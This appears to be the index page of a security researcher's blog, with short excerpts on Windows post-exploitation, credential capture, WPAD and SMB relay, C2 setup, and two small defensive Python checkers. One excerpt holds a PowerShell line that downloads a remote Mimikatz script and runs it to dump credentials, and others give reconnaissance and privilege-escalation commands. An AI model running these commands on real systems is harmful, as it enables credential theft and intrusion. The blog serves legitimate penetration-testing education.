Room362

Blatherings of a security addict

Ever have one of those topics that you know you’ve looked up 100 times but never can remember the answer to?
I was having one of those moments in a recent conversation on the NoVA Hackers mailing list (if you want to join, please read the instructions before requesting to join).
The question came up as to what “Password Required: No” in the output of net user UserName actually means.
As usual, MSDN isn’t very helpful:

With all of the scanning / noise on the Internet, it’s nice to get rid of a large chunk of it simply by blocking an entire country’s worth of IP space. To do that you can use a set of kernel modules for iptables called “xtables-addons”. On Debian/Ubuntu it’s pretty easy to get going; just apt-get install the needed Perl library and the addons themselves:
apt-get install libtext-csv-xs-perl xtables-addons-common
Warning: this does require the proper Linux headers to be available to compile the kernel module.

First off, this is dead simple and shouldn’t work, but it does. Also, there is no possible way that I’m the first one who has identified this, but here it is (trust me, I tested it so many ways to confirm it because I couldn’t believe it was true).
TL;DR USB Ethernet + DHCP + Responder == Creds
Thesis: if I plug in a device that masquerades as a USB Ethernet adapter and has a computer on the other end, can I capture credentials from a system even when it is locked (yes, logged in, just locked)?

Created the 2016 UNOFFICIAL DerbyCon Hiring List. Getting on the list is even easier now! Just complete the following form: https://goo.gl/forms/LW5b1xo4O9D8eVZU2
(One small tip: it’s first come, first served, so if you want to be at the top of the list it’s best to submit the best info you have rather than waiting on anyone. I don’t change the list order for anyone.)
Direct Link to Google Doc: https://docs.google.com/spreadsheets/d/1qlJYhdxljG4f1vHhj5-Vyj5wiRb3YBjQJU4Cqh2cT6k/edit?usp=sharing

Each year I make up a list, the week before Black Hat and DEF CON, of talks that I “can’t miss” and some that I want to see (and use it afterwards to watch the videos of those I missed). This year I thought I would share that list here. I will be breaking them down by each day of the events, by time slot. Any talk with a 🌟 by it is a “must see” for me.

I recently asked a friend if I could have just a list of the domains in the LinkedIn dump: no passwords, no full emails, just domains. I run a program that I lovingly call “DeepMagic” and I feed it domains whenever I can. Well, this time when I tossed the list of domains into the engine it started spitting out tons of errors. There were a total of 9,436,804 unique domain names in the list, and for anyone who works with DNS that isn’t a very big number, so I didn’t think very much of it and didn’t know why it would choke on a list that small.

Recently saw a link to an SCF file. Didn’t know what those were, so I went digging. Turns out they are a simple text-based file format that controls Windows Explorer. ;-)
Here are the examples I found via the references:
Open Explorer:
[Shell]
Command=2
IconFile=explorer.exe,1
[Taskbar]
Command=Explorer
Open "Channels" page in IE:
[Shell]
Command=3
IconFile=shdocvw.dll,-118
[IE]
Command=Channels
This didn’t work for me at all, probably because Internet Explorer doesn’t have “Channels” anymore.

Mostly just writing this so I can keep notes.
Today I came up with the idea of forcibly putting a WPAD entry into a Windows domain’s DNS. For those who don’t know what this would do, there is an entire Wikipedia article on the subject: https://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
I did this via PowerShell pretty easily on one of the domain controllers like so:
PS C:\> Add-DnsServerResourceRecordA -Name wpad -ZoneName sittingduck.info -IPv4Address 107.
One caveat worth checking before assuming the record is live: Windows DNS Server ships with a Global Query Block List that contains wpad (and isatap) by default, so the server will refuse to answer queries for that name even when the record exists. Get-DnsServerGlobalQueryBlockList shows what is currently blocked.

Previous works: There have been a number of different blog posts, presentations and projects that preceded this post. I will reference a number of them during the post and at the end link to all that I know about. If you know of any works on this subject that I am missing, please submit a comment below and I’ll be sure to reference it.

Metasploit Minute Season 6 is on the air! I know we have been away for a long while. The first episode is posted at https://www.patreon.com/posts/5083466. Each Monday a link will be posted on the Patreon site, or, if you find RSS feeds easier, you can find it over at http://metasploitminute.com

Yes yes yes, I know, another platform, but guess what, it’s my blog, so ne-ner-ne-ner-ne-ner.
Hugo removed what I didn’t like about Octopress (the generating / pushing of content using a mix of branches and such).
The reason I moved from Blogger was that I just can’t stand having to log in and be online to make posts. I love things like MarsEdit for doing offline posts to services like Blogger, but I never could get the formatting right when I was done, especially for code, so I’m back to a markdown-based system.

Created the 2016 UNOFFICIAL ShmooCon Hiring List. Getting on the list is even easier now! Just complete the following form: http://goo.gl/forms/pbYI0TZ9dG
(One small tip: it’s first come, first served, so if you want to be at the top of the list it’s best to submit the best info you have rather than waiting on anyone. I don’t change the list order for anyone.)
Direct Link to Google Doc: https://docs.google.com/spreadsheets/d/15xqphPVEnH7o2urovHWjJiS1VCjdAqcPNB_HS0yRexU/

Ever want to have all of your C2 go to the same box, have the functionality of Meterpreter and Empire, and make it so that if anyone browses to the actual site of your C2 all they get is something like Google?
Nginx makes that possible, and instead of making a blog post that will disappear, I’ll point you at my combo on my “Attacker Knowledge Base” site:
https://attackerkb.com/Combinations/ReverseProxyAttackTools
and instead show you the results once it’s set up:

Hi. I’m Rob… and I have a problem. Let’s just say, when you find the limitations of Amazon’s wishlist features for single items, you know you have a problem. My problem? I’m kinda addicted to Intel NUCs. They are so versatile, low-ish power consumption, and incredibly powerful and TINY. I carry 3 of these (the older / cheaper ones) around to run my trainings / classes from.
The following is my current wishlist.

Meterpreter’s STDAPI extension (the one that always gets loaded) has a new command. This doesn’t happen very often, so it’s worth noting.
The new command prints out the currently attached “mounts”. In the Windows world that means the normal CD-ROM, C: drive, etc., but it also means all of the mounted network drives as well.
This gets very interesting when you happen to find yourself in a VM environment where you can start writing files to the host:

Time is a one-time non-renewable precious resource you are given. It is ok to be greedy, selective, and even snobbish about how, and with whom you spend it.
If it helps, think of your time as a vault, money is withdrawn at a constant rate by people as you spend it, but you are not allowed to look inside to see how much you have left. It could be a billion dollars, it could be .

I recently took the plunge and joined a startup called R5 Industries. I wanted to say thanks for all the well wishes that I received on social media. It has certainly calmed my nerves about the choice ;-).
I’ve had a number of people ask what R5 Industries does. Our primary selling point is AntigenC2, which is a Command and Control detection product (no agents). But we also do Red Team assessments and have some other fun toys; if you are interested, contact@r5industries.

One of the best resources for persistence mechanisms is Hexacorn’s blog: http://www.hexacorn.com/blog/category/autostart-persistence/
If you haven’t checked out his “Beyond good ol’ Run key” (linked above) 32-post series, you really should. But today I wanted to talk about one that I didn’t see up there:
DNVM (https://github.com/aspnet/dnvm) is the .NET Version Manager and is part of ASP.NET 5, which I believe has shipped inside Visual Studio since the 2013 version.

If you found this post via a search, you are probably like me: “not great” at keeping your desktop clear of “stuff” (you probably have a ‘stuff’ folder you once put stuff in and forgot about).
If you are, and you go into a presentation, you probably don’t want to have all of your icons visible (and possibly recorded). Hiding your desktop icons on Windows (since 7, I believe) is pretty simple.

Today I was asked by @Krystropolis for a “Hello” and maybe some hacking advice, see tweet:
@mubix I have my class in 4 hours. Would you be willing to post a 'hello' and maybe some hacking advice for my class demo? #PSUBehrend #CTF
— Krystal Elliott (@krystropolis) September 24, 2015 I thought about it on my entire 1 hour drive home from just turning in my badge and laptop from a big corporation to go work at a start up.

AKA - ROB WRITES POWERSHELL!!
Yesterday I posted a way to dump hashes using a Domain Controller account. But how do you know which account to use? And when was its password last set? net user unfortunately won’t do computer accounts.
So I decided to write a PowerShell script to find out. Unfortunately Windows 7 doesn’t come with the ActiveDirectory PowerShell module (I’m sure there is another way to do this, but here is how I did it).

Since I follow both Carlos Perez and Benjamin Delpy on Twitter, something caught my eye on August 2nd, soon after Benjamin Delpy dropped DCSync:
@Carlos_Perez haha, if yes, it will be a 0d ;)
No, like always it needs some rights ;) DA is cool, maybe DC$ is enough
— Benjamin Delpy (@gentilkiwi) August 2, 2015 And then later on August 28th, again about the DC$ account (Domain Controller computer account):

It’s often tough for both hiring managers and job hunters to find one another at conferences. I think this is mostly because of a couple of things.
No one wants to stand at a booth on either side and talk job stuff in front of a bunch of people, and people at booths rarely get the chance to get away. It’s hard to know “who” to talk to. So I created a very simple Google doc to help put Twitter handles and links together for people who are job hunting and people who are hiring, to kinda get to know who to talk to.

The teflon crew at Pied Piper suffered quite a bit during Season 2 of SILICON VALLEY. But there was no greater indignity than being brought to their knees by a tequila bottle.
Since episode eight “White Hat/Black Hat” aired, many skeptical viewers have asked: how could something like this happen?
Could a mindless error of pressing a delete key really cause a venerable company like Intersite to lose over nine thousand hours of content (including an irreplaceable archive of vintage yiffing videos)?

I’ve had my fair share of “trying new things” after SquareSpace. I tried Ghost, Octopress, WordPress, and about 30 others in between. All the blogging platforms I tried had some major issues that I didn’t like. I’m sure at some point I’ll write about them, but this post is mostly just to announce that I have finally given up the fight for finding the perfect blogging platform and I’m just going to blog on Blogger from now on.

A while back I needed to set up a pfSense box for CTF/example stuff that didn’t and wouldn’t ever have Internet connectivity. Doesn’t seem like much of a task, right? Just pop it in and go. Problem is that you lose the use of the packages that help make pfSense so awesome.
Once I figured it out at that time, I made a forum post so that anyone running into the same issue wouldn’t have to struggle as much:

Metasploit Minute has entered its 3rd “season”. And we kick it off by using the Metasploit capture modules to capture creds from this PowerShell credential popup. The cool thing about this is you can leave it executing on a system without any other code on disk and get creds constantly, as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL.

Update: I originally posted this to the Full Disclosure mailing list but for some reason it wasn’t accepted via the moderator so I’m posting it here. First, so that the information does get out there, and second to see if anyone knows why it may have been rejected.
I was helping out a family member with their computer when it came up that they “already had remote help software” (SingleClickConnect or SCC), when I asked what this was, the family member said it was installed by Dell Support when trying to fix their issue.

As I learn more and more about OSX I find things that surprise me. For instance, in this post I will be showing you how to, with root or sudo privilege, enable the built-in Apache server on OSX and its PHP module….
I am working with OSX Mavericks, so your locations may vary based on the version of OSX your target is.
First things first is to enable the PHP module for the Apache server.

One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What’s the problem with that? Isn’t SYSTEM god mode? Ya, and normally I’d agree that it’s the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn’t get any proxy settings.

Anyone who knows me knows that I live in a tiny world of offensive security, so much so that I miss large world events entirely. (Like elections and hurricanes)
I didn’t know Aaron Swartz, or even 1% of what he was doing in the world to make it a better place and for that I am ashamed. I will do better, to look around, see what needs to be changed in this world and make it a reality.

Let me start off by saying this post is easy for me to write in one facet as I’ve never been a heavy drinker or much enjoyed the taste of alcohol. So if you need a reason to disregard what I say next, I leave the door open.
I am still pretty much a runt in the infosec community as I didn’t even begin learning computers (outside of playing games on them) until 2005.

Keeping it here for notes and just in case anyone else runs into this same issue.
brew install pip
sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto
If you have a better way please leave a comment below!

SMB Relay has been around for a long while. I even have a post about using it along with LNK files here:
MS08-068 + MS10-046 = Fun until 2018
Here is the problem, though. Most of the tools to exploit it either catch the authentication as NTLMv2/NTLMv1 (which is not always easy to crack) or assume administrative access (because they attempt to PSEXEC with the incoming session). Well, since MS08-068 that’s much harder to pin down.

This is my box. There are many like it, but they are all mine.
My malware is my best friend. It is my life. I must master it as I must master my life.
My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me.

So there was this blog post that talked about a number of ways to dump Windows credentials by @lanjelot [definitely someone to follow] - here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)“
What it boils down to is: if you can position a system that can do DNS resolution to the target domain, and perform some other UDP traffic, you can fake-join a Samba server you control to the domain, and it doesn’t require code execution on the domain controller in any way.

PSEXEC has been a staple for Windows post-exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:
(Optional) Upload a service executable (PSEXESVC.EXE in the case of the Sysinternals tool) to the ADMIN$ share.
Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.

Everyone has their list of hostnames they brute force domains with. In my last post I even mentioned a few ways to use one with XARGS or PARALLEL. But one fact about wordlist brute forcing is that there is no “one list to rule them all”. But over the years of doing DNS record collection I have noticed one thing, most domains have a large number of short hostnames that are easy to remember, usually 4 characters or less.

Quick update: As @MikeDamm points out, xargs has a -P option that can do the same thing I’m using parallel for. If you have a supported version of xargs you can use -P 0 to do the same thing as -j0 with parallel, but if your version doesn’t support the 0 you can simply use the same number parallel uses, a la:
cat subdomains.txt | xargs -P 122 -I subdomain dig +noall subdomain.

Guest post by @infosecsmith2
There was a recent presentation at DerbyCon, entitled:
Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation by Christopher Campbell & Matthew Graeber
I highly recommend that you start with this presentation, as it lays the foundation for this post.
The premise is: how can we maintain persistence in a corporate environment using only the tools and defaults provided by the host OS we have compromised? This is a very important concept, given the shift in many organizations to an application whitelisting defense model.

Since I’ve been gone, OJ has released the ExtAPI (Extended API) for Meterpreter. This has some pretty amazing functionality. You can find OJ’s write-up on it, and on the other amazing things he did in 3 months of Meterpreter work, on the Metasploit blog.
Just brushing the surface, and to help people see the power of this new functionality, I went ahead and created a few Meterpreter scripts that can really mess with someone.

I’ve taken a rather long hiatus from blogging. This is mostly because I was fed up with the blogging platform that I had (Squarespace) and didn’t really have any alternatives that met all of the features I wanted.
So, where am I at now? GitHub, actually. GitHub allows users to create “GitHub Pages” for repositories (or as their own repo). For the most part these pages are written in Markdown. It’s late and I don’t feel like looking up who, but someone created a project called “Jekyll”, which is a Ruby-based static page generator, and then another project called “Octopress” popped up using Jekyll to create a static-HTML-based blogging platform.

clymb3r recently posted a script called “Invoke-Mimikatz.ps1”. Basically what this does is reflectively inject mimikatz into memory, call for all the logonPasswords and exit. It even checks the target’s architecture (x86/x64) first and injects the correct DLL.
You can very easily use this script directly from an admin command prompt like so:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
(This works REALLY well for Citrix and kiosk scenarios, and it’s not too hard to type/remember.) This runs the PowerShell script by directly pulling it from GitHub and executing it “in memory” on your system.

cross posted from: http://carnal0wnage.attackresearch.com/2013/10/ad-zone-transfers-as-user.html
The tried and true methods for zone transfers use either nslookup:
nslookup
ls -d domain.com.local
Or dig:
dig -t AXFR domain.com.local @ns1.domain.com.local
In the Windows Enterprise world there are a few more options. If you are a DNS Admin you can use the ‘dnscmd’ command like so:
dnscmd /EnumZones
dnscmd /ZonePrint domain.com.local
Which is handy if you can pop the DNS server (usually the Domain Controller, so you usually have better things to do at that point).

Password Filters [0] are a way for organizations and governments to enforce stricter password requirements on Windows accounts than those available by default in Active Directory Group Policy. How to install and register password filters is also fairly well documented [1]. Basically what it boils down to is adding the name of a DLL (without the extension) to the registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages,
with the DLL itself placed in Windows\System32.
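A defender-side check for this mechanism, written as an added Python example (not code from the original post): it parses the text output of reg query for the Lsa key, splits the REG_MULTI_SZ value on its \0 separators, and reports any notification package that is not in a baseline. The reg query output below is constructed for the example, and the baseline set (scecli everywhere, RASSFM on domain controllers) is an assumption to adjust for your own builds. Anything you cannot account for deserves a look, because a notification package DLL receives every new password in cleartext.

```python
from __future__ import annotations

# Constructed `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa` output, not captured
# from a real host. reg.exe prints REG_MULTI_SZ entries separated by a literal "\0".
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Notification Packages    REG_MULTI_SZ    RASSFM\0scecli\0pwfilt
    Authentication Packages    REG_MULTI_SZ    msv1_0
"""

# Assumed baseline: scecli ships on every Windows box, RASSFM only on domain controllers.
DEFAULT_NOTIFICATION_PACKAGES = {"scecli", "rassfm"}


def parse_notification_packages(reg_output: str) -> list[str]:
    """Return the Notification Packages entries from `reg query` text output."""
    for line in reg_output.splitlines():
        name, sep, rest = line.strip().partition("REG_MULTI_SZ")
        if sep and name.strip() == "Notification Packages":
            # reg.exe separates multi-string entries with a literal backslash-zero.
            return [entry for entry in rest.strip().split("\\0") if entry]
    return []


def unexpected_packages(packages: list[str],
                        baseline: set[str] = DEFAULT_NOTIFICATION_PACKAGES) -> list[str]:
    """Packages not in the baseline; comparison is case-insensitive like the registry."""
    return [p for p in packages if p.lower() not in baseline]


def dll_paths_to_inspect(packages: list[str]) -> list[str]:
    """Where LSA will load each package from: %SystemRoot%\\System32\\<name>.dll."""
    return [f"C:\\Windows\\System32\\{p}.dll" for p in packages]


if __name__ == "__main__":
    found = parse_notification_packages(SAMPLE_REG_QUERY)
    odd = unexpected_packages(found)
    print("Notification Packages:", found)
    for path in dll_paths_to_inspect(odd):
        print("inspect:", path)
```

Feed it the real output of reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa and check the signer and timestamp of each DLL it points at.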

If you’ve ever used proxychains to push things through Meterpreter, one of the most annoying things is its “hardcoded” DNS setting for 4.2.2.2, if the org that you are going after doesn’t allow this out of their network, or if you are trying to resolve an internal asset, you’re SOL. After a ton of googling and annoyed head slams into walls every time I forget where this is I’ve finally decided to make a note of it.

Saw this post about a kernel bug in 64 bit Windows that is a DoS, it can also create an unkillable process: Blog post: http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html
Figured I’d take a swing at making a module that I could put Meterpreter into an unkillable state. Good times at CCDC could be had.
Started with the C code for the bug: http://pastebin.com/QejGQXib along with the only resource I could find about the actual function: http://processhacker.

Problem is that everyone does this whole blogging thing in so many different ways. Me, personally? I like to have a client that I can save drafts in, work on things a little bit here and there, and then finalize stuff when I’m ready to post. I have a couple dozen of these posts ready and set with final tweaks needed, but my blogging software, Squarespace, up and moved on to “Squarespace 6”.

This and part 2 are mostly just an update to http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html but without the need for VSSOwn, and we are doing it remotely without the need for a shell on the DC.
Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV and GPOs not allowing anyone to RDP in (even Domain Admins) unless they performed some kind of voodoo happy dance?

Mimikatz is now built into Metasploit’s meterpreter, you can do load mimikatz from the meterpreter prompt, but if you don’t want to go through the hassle of dealing with AV, reverse or bind payloads, meterpreter binaries, and you have clear text credentials for an admin, you can just use Mimikatz’s alpha release that allows you to run Mimikatz on your machine against a process memory dump of LSASS. The great thing about this technique is that the only thing on disk is a Microsoft tool.

This is how I did it:
for /f "tokens=5 delims=\" %A in ('reg query HKLM\SYSTEM\CurrentControlSet\Services') do sc qc %A
(The backslash is the delimiter: it splits each key path so that token 5 is the service name, which is then handed to sc qc.)
Let me know if you know of a better way.
If you don’t know why this could be important, read here:
http://www.ihtb.org/security/program.exe-privilege_escalation.txt
If you are on a Win7 box or otherwise have the option to use WMI you can use the following command:
wmic service get pathname
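The check the linked write-up describes, as an added Python example that is not code from the original post: it takes the PathName column from wmic service get pathname, flags unquoted image paths that contain spaces, and lists the file names Windows tries first when it starts such a service (C:\Program.exe for anything under C:\Program Files, then the next space-delimited prefix, and so on). The wmic output below is constructed for the example. Whether one of those locations is actually writable still has to be checked on the host, for instance with icacls.

```python
from __future__ import annotations

# Constructed `wmic service get pathname` output; not from a real host.
SAMPLE_WMIC_OUTPUT = """PathName
C:\\Windows\\system32\\svchost.exe -k netsvcs
"C:\\Program Files\\Good Vendor\\agent.exe" --service
C:\\Program Files\\Some Vendor\\Sub Dir\\badsvc.exe -run
C:\\Tools\\nospaces.exe
"""


def parse_wmic_pathnames(output: str) -> list[str]:
    """Return the PathName values, dropping the column header and blank lines."""
    lines = [ln.rstrip() for ln in output.splitlines()]
    return [ln for ln in lines[1:] if ln.strip()]


def split_image_path(pathname: str) -> tuple[str, bool]:
    """Return (image path, was_quoted).

    A quoted path is unambiguous. For an unquoted one, take every token up to the
    first argument-looking token ('-x' or '/x'); that is the string the service
    control manager has to disambiguate, which is exactly the problem.
    """
    s = pathname.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end] if end != -1 else s[1:]), True
    path_parts: list[str] = []
    for token in s.split():
        if path_parts and token[:1] in ("-", "/"):
            break
        path_parts.append(token)
    return " ".join(path_parts), False


def hijack_candidates(image_path: str) -> list[str]:
    """File names tried before the real executable when the path is unquoted.

    CreateProcess treats each space as a possible end of the program name and
    appends .exe, so C:\\Program Files\\Some Vendor\\Sub Dir\\badsvc.exe yields
    C:\\Program.exe, C:\\Program Files\\Some.exe, C:\\Program Files\\Some Vendor\\Sub.exe.
    """
    return [image_path[:i] + ".exe" for i, ch in enumerate(image_path) if ch == " "]


def find_unquoted_service_paths(output: str) -> dict[str, list[str]]:
    """Map each vulnerable PathName to the locations an attacker would try to plant a binary in."""
    findings: dict[str, list[str]] = {}
    for pathname in parse_wmic_pathnames(output):
        image, quoted = split_image_path(pathname)
        if quoted or " " not in image:
            continue
        findings[pathname] = hijack_candidates(image)
    return findings


if __name__ == "__main__":
    for svc, spots in find_unquoted_service_paths(SAMPLE_WMIC_OUTPUT).items():
        print(svc)
        for spot in spots:
            print("   would be tried first:", spot)
```

Pipe the real wmic output through find_unquoted_service_paths and then test each reported prefix directory for write access; C:\ itself is normally not writable by standard users, but vendor directories under C:\Program Files often are.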

Mimikatz is awesome right, so is WCE. But both have one fatal flaw, even though you can execute them in memory {link} - you still have to have the binaries, remember the command to execute it in memory, and ultimately transfer the entire binary over so that metasploit can do its thing.
Then along came SessionDump. I only noticed this because someone was tweeting congratulations to someone on writing it:

Just a quick post to say that egypt and I will be giving Metasploit Mastery twice (2 x 2-day sessions) at Black Hat USA 2013. Come out and get your Metasploit on in Vegas w/ us.
Linky: http://www.blackhat.com/us-13/training/metasploit-mastery.html
Current fill rate of July 27-28 session:
Current fill rate of July 29-30 session:
EOM

This is one of those stupid simple things that are easy to forget, so I’m posting it here. Wordlists and dictionaries are awesome for cracking password hashes, and although, thanks to things like Mimikatz and WCE, I often don’t have to crack anymore, there are times when it’s important.
Now, having John, Hashcat, or Cain go through a dictionary is a 1-for-1 hit: no time is wasted no matter how it’s sorted, but it is usually best to sort by most common first so you get earlier hits.

You’ve found an NFS share on a pentest, it’s sharing out your target’s home directories (/home) and some SAN with all of the Windows AD users “home” directories under /volumes/users/. You only have a meterpreter session though… enough back story, problem is that Metasploit doesn’t really have any auxiliary modules or otherwise to access the things on those shares. Please correct me if I’m wrong, but there also aren’t any tools for talking to NFS shares over TCP only proxies.

It seems like every week there is a new compromise of some service or another. But as a user what are you supposed to do with this knowledge? Here are some suggestions on things to do or think about when reacting:
Do you use the password you use there anywhere else? Think about starting to use a password manager like LastPass, 1Password, KeePass, or a product like Yubico. This way you can very easily use different passwords for different sites.

The following has been a concept for me for a long time, and recently I tweeted the idea, which really put me under the fire to prove it. (re: the #justanidea hashtag)
And a few people came up with some very valid points:
1) Doesn’t work so well with HTTPS sites
He’s right, but that forces the attack to use SSL, and doing so can yield the defender more information about the attacker, and offer other avenues of defense.

This is here because I always forget how to do it.
sudo apt-get install libtirpc-dev libncurses-dev
wget http://www.cs.vu.nl/pub/leendert/nfsshell.tar.gz
tar zxvf nfsshell.tar.gz
cd nfs
ln -s /usr/include/tirpc/rpc/clnt_soc.h /usr/include/rpc/clnt_soc.h
perl -p -i.orig -e 's/getline/getline_nfs/' nfs.c
The next part I don’t have a good way to automate. You need to go in and comment out (w/ #) the 4 lines following “uncomment the following 4 lines for Solaris 2.x” and uncomment the 2 lines following “For GNU readline support you need to add”.

Thanks to @spatial_d for the tweet here: https://twitter.com/spatial_d/status/302253050725298176
I’m capturing it here more as a bookmark for myself:
Build It: http://www.ustream.tv/channel/build-it-2013
Belay It: http://www.ustream.tv/channel/belay-it-2013
Bring It On: http://www.ustream.tv/channel/bring-it-2013

In 2012 @egypt and I taught Metasploit Mastery for a day and a half @DerbyCon . This was a lot of fun but we had to cram a TON of slides into that short period of time. PLUS we had a CTF at the end where people had to break into a corporate network (virtualized) and sell their shells, data, passwords, or flags to us (egypt and I were acting as opposing countries).

I made a slide deck to kind of explain my latest project. Basically I got fed up with having dictionaries, passwords, and cracking tools but no way to really do better collaboration in a team format as well as just better management for myself. Please feel free to submit pull requests, issues if you think something is broken or want features, or whatever on the Github repo here:
https://github.com/mubix/WhiteChapel/
Here is the slide deck:

Drink!!
So I’ve been working on a training package that takes a bit of a different approach than what I’ve normally done. The training breaks down like this:
Day 1: Local LAN based exploit (Windows)
Day 2: Remote Web based exploit (Linux)
Day 3: Client side exploit (Windows)
Day 4: Local exploit (FreeBSD)
Day 5: Network of the Seven Bells Test
Each day (save for the 5th) will focus on a single exploit: explaining it, running it on virtual machines, and spending 8 hours diving into as many detectable changes as that exploit makes on a system.

Not very security related, but something I don’t want to forget how to do. It was a PITA. I had an old WINDOWS directory that I needed to get rid of, and the following commands gave me the oomph needed to get the job done.
1) Get a SYSTEM shell so all modding of permissions will be good.
psexec /accepteula -i -s cmd
2) Grant Administrators FULL rights to the directory and all sub-directories and files.

Let me say first off that this isn’t the most elegant of ways to accomplish it. It is in the “it works for me” stage.
A quick primer on EXE::Custom: This is a setting just like RHOST in Metasploit wherever an EXE is built for Windows payloads. Such as PSEXEC, BypassUAC, etc. It tells Metasploit to ignore all of your payload settings and just use the EXE you have specified. Now this does come at a bit of a cost.

Looking through network shares can be slow, and waiting for individual searches to finish looking through the whole “drive” is redundant. Easier to just use some Windows voodoo to get a good list to look through offline:
start /b cmd /c dir /b /s \\nas\users_home_share$ ^> shareinfo.txt
Breaking that down:
start /b - starts a process that won’t hang up our current one, with the “b” flag meaning “background”: yay, not visible to the user!

You’ve got a shell and a set of credentials, but you’re coming up empty on what you can do with those credentials. This is especially problematic when you can’t get past UAC, as you are either in an AlwaysNotify situation or not a local admin.
(I’m not trying to pull some “insert magic here” on the assumption of credentials; at the time of this writing I have only just started working (created a blank file) on a post module to do this as your current user, so until then, you need credentials.)

Dave Kennedy and Kevin Mitnick submitted the “bypassuac” post module to Metasploit a while back (last DerbyCon?). Which is awesome and they did some fantastic work, but I had a few complaints as probably anyone did who used the module on a somewhat modern network.
“Old” module post/windows/escalate/bypassuac:
I decided to give it a bit of a face lift:
“New” local exploit module exploit/windows/local/bypassuac:
All of the credit for the availability of this module goes to @egyp7 though, without his epic addition of local exploits to Metasploit the majority of the updates to this module wouldn’t be possible.

Since I didn’t see any documentation that brings together, all in one place, how to take an LM hash that you’ve cracked and convert it to the NTLM equivalent, and I google how to do it almost every time, I wanted to put all these links in one place and remember how to do it for john. Go-go-gadget blog-notes.
So there is this: https://github.com/snarez/rcracki/blob/master/lm2ntlm.cpp
And this: https://github.com/rapid7/metasploit-framework/blob/master/tools/lm2ntcrack.rb
And this: http://www.securityfocus.com/tools/6696
And the edited version of the above: http://atenlabs.

TL;DR – DNSSEC Walker traverses a domain’s DNSSEC records to locate its regular DNS records.
I like to go through slides of cons I can’t make it out to, and Hack in the Box (HITB) KUL (Malaysia) was one such, as they were very quick to release slides:
http://conference.hitb.org/hitbsecconf2011kul/materials/
One that I came across is Marc “van Hauser” Heuse’s talk on IPv6 titled “IPv6 Insecurity Revolutions” (link directly to the PDF on the aforementioned materials page).

One of the great things about the reverse_http(s) payloads is that they are proxy-aware. However, one of the pitfalls to this is that SYSTEM doesn’t have proxy settings, nor do users who have never logged into a system (unless profile loading is triggered). The problem here arises when you are trying to do anything as SYSTEM; also, PSEXEC only has the option of getting you a SYSTEM shell (so you’re done for right out of the door).

Ok, this is pretty straightforward, no magic:
Got a shell, doesn’t have to be SYSTEM
Add a route to the internal range or directly to the host you want over the session you want
Mosey on over to the Socks4a module. And in another terminal we need to make sure our proxychains.conf file in /etc/ or wherever you store your conf is correct. It defaults to 9050 on 127.

UPDATE: THIS ONLY WORKS WITH THE LOCAL ADMIN (ID 500) ACCOUNT AND PASSWORD
(MY MISTAKE FOR NOT TESTING MORE)
So the “-ish” is you need to have the username and pass of another account that has administrator rights (the local administrator account on that box). But other than that, the following image should speak for itself. (no UAC prompt occurred during the following actions)
I plan on writing a Metasploit module to do this, as all it really does is start a process as a different user, and that process executes ShellExecute’s ‘RunAs’ verb.

I read this article a while back:
http://fuzzynop.blogspot.com/2012/09/pass-hash-without-metasploit.html
by @FuzzyNop
Great article showing the use of WCE’s “-s” flag to Pass-The-Hash locally and I highly recommend checking it out. Anywho, I was once in a similar scenario, where I had no Metasploit to back me up, but the box I was on did have one interesting thing, ruby and an accessible target for relatively up-to-date ruby gems. Since Metasploit’s powerhouse library ‘rex’ installed just fine I was set.

If you follow the exact same steps you did for Netview: /blog/2012/10/07/compiling-and-release-of-netview/
then you already have the steps needed to create a compiled version of ditto from the repo here:
https://github.com/mubix/ditto
And while the sheep icon is cute, and a nod to what ditto does, it comes at a pretty hefty cost:
Size. Now if you’re scoffing at 408 KB then you don’t have any issues, but I like not having to wait while a binary I am trying to push to a victim box is transferring.

If you haven’t caught Chris Gates (@carnal0wnage) and my talk at DerbyCon 2012 - we released 2 tools, Netview and Ditto. Here I’ll walk you through compiling Netview yourself; in the next blog post we’ll go over compiling Ditto and how you can remove its icon to reduce the size if you want. But for Netview it’s pretty straightforward. First you pull a copy of the GIT repository:
https://github.com/mubix/netview

pfSense is an excellent free way of including a firewall / IDS / proxy in your lab or VMs. It runs small and fast, but even as simple as pfSense is, sometimes you need a bit less complexity and faster configuration.
Enter Peerblock and AnalogX’s proxy. Two free tools, one usually used to stop people who torrent from getting caught by the RIAA/MPAA and the other a drop-dead simple Windows-based proxy utility.

Once you’re done staring at the Star Trek deity above (it’s a staring contest you will lose since you are such a simplistic race), I pull your attention to: https://github.com/mubix/q
This repository / exploit pack was created for the sole purpose to house modules, scripts and resource files that would otherwise not be accepted into the Metasploit trunk. It will always be free and anyone is free to submit pulls of modules, scripts or resource files that they created or just found and were not accepted to the trunk because it was just a script, it violates TOS of a service, they did not author it, or any other possible reason.

Executing WCE.exe in memory as demoed by Egypt here: https://community.rapid7.com/community/metasploit/blog/2012/05/08/eternal-sunshine-of-the-spotless-ram has two issues with it. 1. You leave a file on disk with your hashes and clear text passwords. That just won’t do. 2. There is this DLL called WCEAUX.dll that gets written for the briefest second to disk:
(yes I realize I’m running this on disk ‘wce32.exe’, but it exhibits the same DLL drop when doing in-memory)
